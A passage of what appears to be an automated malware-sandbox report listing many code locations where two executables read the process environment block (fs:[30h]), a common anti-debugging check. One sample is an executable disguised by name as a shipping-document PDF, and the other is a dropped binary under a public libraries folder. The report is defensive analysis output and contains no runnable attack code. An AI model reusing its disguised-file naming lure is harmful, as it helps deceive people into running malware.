Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C06CF0 mov eax, dword ptr fs:[00000030h]	11_2_00C06CF0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C06CF0 mov eax, dword ptr fs:[00000030h]	11_2_00C06CF0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C414FB mov eax, dword ptr fs:[00000030h]	11_2_00C414FB
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C1C450 mov eax, dword ptr fs:[00000030h]	11_2_00C1C450
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C1C450 mov eax, dword ptr fs:[00000030h]	11_2_00C1C450
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BBBC2C mov eax, dword ptr fs:[00000030h]	11_2_00BBBC2C
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]	11_2_00C41C06
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]	11_2_00C41C06
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]	11_2_00C41C06
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]	11_2_00C41C06
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]	11_2_00C41C06
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]	11_2_00C41C06
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]	11_2_00C41C06
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]	11_2_00C41C06
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]	11_2_00C41C06
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]	11_2_00C41C06
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]	11_2_00C41C06
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]	11_2_00C41C06
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]	11_2_00C41C06
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C41C06 mov eax, dword ptr fs:[00000030h]	11_2_00C41C06
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C5740D mov eax, dword ptr fs:[00000030h]	11_2_00C5740D
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C5740D mov eax, dword ptr fs:[00000030h]	11_2_00C5740D
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C5740D mov eax, dword ptr fs:[00000030h]	11_2_00C5740D
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C06C0A mov eax, dword ptr fs:[00000030h]	11_2_00C06C0A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C06C0A mov eax, dword ptr fs:[00000030h]	11_2_00C06C0A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C06C0A mov eax, dword ptr fs:[00000030h]	11_2_00C06C0A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C06C0A mov eax, dword ptr fs:[00000030h]	11_2_00C06C0A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BA746D mov eax, dword ptr fs:[00000030h]	11_2_00BA746D
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BBA44B mov eax, dword ptr fs:[00000030h]	11_2_00BBA44B
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C06DC9 mov eax, dword ptr fs:[00000030h]	11_2_00C06DC9
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C06DC9 mov eax, dword ptr fs:[00000030h]	11_2_00C06DC9
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C06DC9 mov eax, dword ptr fs:[00000030h]	11_2_00C06DC9
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C06DC9 mov ecx, dword ptr fs:[00000030h]	11_2_00C06DC9
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C06DC9 mov eax, dword ptr fs:[00000030h]	11_2_00C06DC9
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C06DC9 mov eax, dword ptr fs:[00000030h]	11_2_00C06DC9
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB1DB5 mov eax, dword ptr fs:[00000030h]	11_2_00BB1DB5
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB1DB5 mov eax, dword ptr fs:[00000030h]	11_2_00BB1DB5
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB1DB5 mov eax, dword ptr fs:[00000030h]	11_2_00BB1DB5
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB35A1 mov eax, dword ptr fs:[00000030h]	11_2_00BB35A1
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BBFD9B mov eax, dword ptr fs:[00000030h]	11_2_00BBFD9B
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BBFD9B mov eax, dword ptr fs:[00000030h]	11_2_00BBFD9B
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C38DF1 mov eax, dword ptr fs:[00000030h]	11_2_00C38DF1
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B82D8A mov eax, dword ptr fs:[00000030h]	11_2_00B82D8A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B82D8A mov eax, dword ptr fs:[00000030h]	11_2_00B82D8A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B82D8A mov eax, dword ptr fs:[00000030h]	11_2_00B82D8A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B82D8A mov eax, dword ptr fs:[00000030h]	11_2_00B82D8A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B82D8A mov eax, dword ptr fs:[00000030h]	11_2_00B82D8A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A020A0 mov eax, dword ptr fs:[00000030h]	17_2_00A020A0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A020A0 mov eax, dword ptr fs:[00000030h]	17_2_00A020A0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A020A0 mov eax, dword ptr fs:[00000030h]	17_2_00A020A0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A020A0 mov eax, dword ptr fs:[00000030h]	17_2_00A020A0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A020A0 mov eax, dword ptr fs:[00000030h]	17_2_00A020A0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A020A0 mov eax, dword ptr fs:[00000030h]	17_2_00A020A0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A190AF mov eax, dword ptr fs:[00000030h]	17_2_00A190AF
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D9080 mov eax, dword ptr fs:[00000030h]	17_2_009D9080
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0F0BF mov ecx, dword ptr fs:[00000030h]	17_2_00A0F0BF
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0F0BF mov eax, dword ptr fs:[00000030h]	17_2_00A0F0BF
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0F0BF mov eax, dword ptr fs:[00000030h]	17_2_00A0F0BF
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A53884 mov eax, dword ptr fs:[00000030h]	17_2_00A53884
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A53884 mov eax, dword ptr fs:[00000030h]	17_2_00A53884
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D58EC mov eax, dword ptr fs:[00000030h]	17_2_009D58EC
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A6B8D0 mov eax, dword ptr fs:[00000030h]	17_2_00A6B8D0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A6B8D0 mov ecx, dword ptr fs:[00000030h]	17_2_00A6B8D0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A6B8D0 mov eax, dword ptr fs:[00000030h]	17_2_00A6B8D0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A6B8D0 mov eax, dword ptr fs:[00000030h]	17_2_00A6B8D0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A6B8D0 mov eax, dword ptr fs:[00000030h]	17_2_00A6B8D0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A6B8D0 mov eax, dword ptr fs:[00000030h]	17_2_00A6B8D0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0002D mov eax, dword ptr fs:[00000030h]	17_2_00A0002D
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0002D mov eax, dword ptr fs:[00000030h]	17_2_00A0002D
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0002D mov eax, dword ptr fs:[00000030h]	17_2_00A0002D
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0002D mov eax, dword ptr fs:[00000030h]	17_2_00A0002D
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0002D mov eax, dword ptr fs:[00000030h]	17_2_00A0002D
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A57016 mov eax, dword ptr fs:[00000030h]	17_2_00A57016
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A57016 mov eax, dword ptr fs:[00000030h]	17_2_00A57016
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A57016 mov eax, dword ptr fs:[00000030h]	17_2_00A57016
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009EB02A mov eax, dword ptr fs:[00000030h]	17_2_009EB02A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009EB02A mov eax, dword ptr fs:[00000030h]	17_2_009EB02A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009EB02A mov eax, dword ptr fs:[00000030h]	17_2_009EB02A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009EB02A mov eax, dword ptr fs:[00000030h]	17_2_009EB02A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA4015 mov eax, dword ptr fs:[00000030h]	17_2_00AA4015
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA4015 mov eax, dword ptr fs:[00000030h]	17_2_00AA4015
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009F0050 mov eax, dword ptr fs:[00000030h]	17_2_009F0050
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009F0050 mov eax, dword ptr fs:[00000030h]	17_2_009F0050
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A92073 mov eax, dword ptr fs:[00000030h]	17_2_00A92073
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA1074 mov eax, dword ptr fs:[00000030h]	17_2_00AA1074
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A061A0 mov eax, dword ptr fs:[00000030h]	17_2_00A061A0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A061A0 mov eax, dword ptr fs:[00000030h]	17_2_00A061A0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A569A6 mov eax, dword ptr fs:[00000030h]	17_2_00A569A6
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A551BE mov eax, dword ptr fs:[00000030h]	17_2_00A551BE
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A551BE mov eax, dword ptr fs:[00000030h]	17_2_00A551BE
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A551BE mov eax, dword ptr fs:[00000030h]	17_2_00A551BE
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A551BE mov eax, dword ptr fs:[00000030h]	17_2_00A551BE
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009FC182 mov eax, dword ptr fs:[00000030h]	17_2_009FC182
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0A185 mov eax, dword ptr fs:[00000030h]	17_2_00A0A185
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A02990 mov eax, dword ptr fs:[00000030h]	17_2_00A02990
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A641E8 mov eax, dword ptr fs:[00000030h]	17_2_00A641E8
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DB1E1 mov eax, dword ptr fs:[00000030h]	17_2_009DB1E1
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DB1E1 mov eax, dword ptr fs:[00000030h]	17_2_009DB1E1
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DB1E1 mov eax, dword ptr fs:[00000030h]	17_2_009DB1E1
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0513A mov eax, dword ptr fs:[00000030h]	17_2_00A0513A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0513A mov eax, dword ptr fs:[00000030h]	17_2_00A0513A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D9100 mov eax, dword ptr fs:[00000030h]	17_2_009D9100
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D9100 mov eax, dword ptr fs:[00000030h]	17_2_009D9100
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D9100 mov eax, dword ptr fs:[00000030h]	17_2_009D9100
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009F4120 mov eax, dword ptr fs:[00000030h]	17_2_009F4120
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009F4120 mov eax, dword ptr fs:[00000030h]	17_2_009F4120
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009F4120 mov eax, dword ptr fs:[00000030h]	17_2_009F4120
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009F4120 mov eax, dword ptr fs:[00000030h]	17_2_009F4120
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009F4120 mov ecx, dword ptr fs:[00000030h]	17_2_009F4120
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009FB944 mov eax, dword ptr fs:[00000030h]	17_2_009FB944
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009FB944 mov eax, dword ptr fs:[00000030h]	17_2_009FB944
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DB171 mov eax, dword ptr fs:[00000030h]	17_2_009DB171
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DB171 mov eax, dword ptr fs:[00000030h]	17_2_009DB171
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DC962 mov eax, dword ptr fs:[00000030h]	17_2_009DC962
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0FAB0 mov eax, dword ptr fs:[00000030h]	17_2_00A0FAB0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009EAAB0 mov eax, dword ptr fs:[00000030h]	17_2_009EAAB0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009EAAB0 mov eax, dword ptr fs:[00000030h]	17_2_009EAAB0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0D294 mov eax, dword ptr fs:[00000030h]	17_2_00A0D294
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0D294 mov eax, dword ptr fs:[00000030h]	17_2_00A0D294
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D52A5 mov eax, dword ptr fs:[00000030h]	17_2_009D52A5
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D52A5 mov eax, dword ptr fs:[00000030h]	17_2_009D52A5
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D52A5 mov eax, dword ptr fs:[00000030h]	17_2_009D52A5
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D52A5 mov eax, dword ptr fs:[00000030h]	17_2_009D52A5
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D52A5 mov eax, dword ptr fs:[00000030h]	17_2_009D52A5
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A02AE4 mov eax, dword ptr fs:[00000030h]	17_2_00A02AE4
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A02ACB mov eax, dword ptr fs:[00000030h]	17_2_00A02ACB
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009F3A1C mov eax, dword ptr fs:[00000030h]	17_2_009F3A1C
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DAA16 mov eax, dword ptr fs:[00000030h]	17_2_009DAA16
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DAA16 mov eax, dword ptr fs:[00000030h]	17_2_009DAA16
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A14A2C mov eax, dword ptr fs:[00000030h]	17_2_00A14A2C
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A14A2C mov eax, dword ptr fs:[00000030h]	17_2_00A14A2C
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D5210 mov eax, dword ptr fs:[00000030h]	17_2_009D5210
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D5210 mov ecx, dword ptr fs:[00000030h]	17_2_009D5210
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D5210 mov eax, dword ptr fs:[00000030h]	17_2_009D5210
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D5210 mov eax, dword ptr fs:[00000030h]	17_2_009D5210
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E8A0A mov eax, dword ptr fs:[00000030h]	17_2_009E8A0A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A8B260 mov eax, dword ptr fs:[00000030h]	17_2_00A8B260
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A8B260 mov eax, dword ptr fs:[00000030h]	17_2_00A8B260
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA8A62 mov eax, dword ptr fs:[00000030h]	17_2_00AA8A62
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A1927A mov eax, dword ptr fs:[00000030h]	17_2_00A1927A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D9240 mov eax, dword ptr fs:[00000030h]	17_2_009D9240
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D9240 mov eax, dword ptr fs:[00000030h]	17_2_009D9240
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D9240 mov eax, dword ptr fs:[00000030h]	17_2_009D9240
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D9240 mov eax, dword ptr fs:[00000030h]	17_2_009D9240
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A64257 mov eax, dword ptr fs:[00000030h]	17_2_00A64257
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A9EA55 mov eax, dword ptr fs:[00000030h]	17_2_00A9EA55
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A04BAD mov eax, dword ptr fs:[00000030h]	17_2_00A04BAD
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A04BAD mov eax, dword ptr fs:[00000030h]	17_2_00A04BAD
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A04BAD mov eax, dword ptr fs:[00000030h]	17_2_00A04BAD
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA5BA5 mov eax, dword ptr fs:[00000030h]	17_2_00AA5BA5
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E1B8F mov eax, dword ptr fs:[00000030h]	17_2_009E1B8F
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E1B8F mov eax, dword ptr fs:[00000030h]	17_2_009E1B8F
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A9138A mov eax, dword ptr fs:[00000030h]	17_2_00A9138A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A8D380 mov ecx, dword ptr fs:[00000030h]	17_2_00A8D380
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0B390 mov eax, dword ptr fs:[00000030h]	17_2_00A0B390
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A02397 mov eax, dword ptr fs:[00000030h]	17_2_00A02397
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A003E2 mov eax, dword ptr fs:[00000030h]	17_2_00A003E2
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A003E2 mov eax, dword ptr fs:[00000030h]	17_2_00A003E2
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A003E2 mov eax, dword ptr fs:[00000030h]	17_2_00A003E2
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A003E2 mov eax, dword ptr fs:[00000030h]	17_2_00A003E2
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A003E2 mov eax, dword ptr fs:[00000030h]	17_2_00A003E2
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A003E2 mov eax, dword ptr fs:[00000030h]	17_2_00A003E2
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A553CA mov eax, dword ptr fs:[00000030h]	17_2_00A553CA
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A553CA mov eax, dword ptr fs:[00000030h]	17_2_00A553CA
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009FDBE9 mov eax, dword ptr fs:[00000030h]	17_2_009FDBE9
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A9131B mov eax, dword ptr fs:[00000030h]	17_2_00A9131B
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DF358 mov eax, dword ptr fs:[00000030h]	17_2_009DF358
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A03B7A mov eax, dword ptr fs:[00000030h]	17_2_00A03B7A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A03B7A mov eax, dword ptr fs:[00000030h]	17_2_00A03B7A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DDB40 mov eax, dword ptr fs:[00000030h]	17_2_009DDB40
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA8B58 mov eax, dword ptr fs:[00000030h]	17_2_00AA8B58
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DDB60 mov ecx, dword ptr fs:[00000030h]	17_2_009DDB60
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E849B mov eax, dword ptr fs:[00000030h]	17_2_009E849B
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A914FB mov eax, dword ptr fs:[00000030h]	17_2_00A914FB
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A56CF0 mov eax, dword ptr fs:[00000030h]	17_2_00A56CF0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A56CF0 mov eax, dword ptr fs:[00000030h]	17_2_00A56CF0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A56CF0 mov eax, dword ptr fs:[00000030h]	17_2_00A56CF0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA8CD6 mov eax, dword ptr fs:[00000030h]	17_2_00AA8CD6
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0BC2C mov eax, dword ptr fs:[00000030h]	17_2_00A0BC2C
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA740D mov eax, dword ptr fs:[00000030h]	17_2_00AA740D
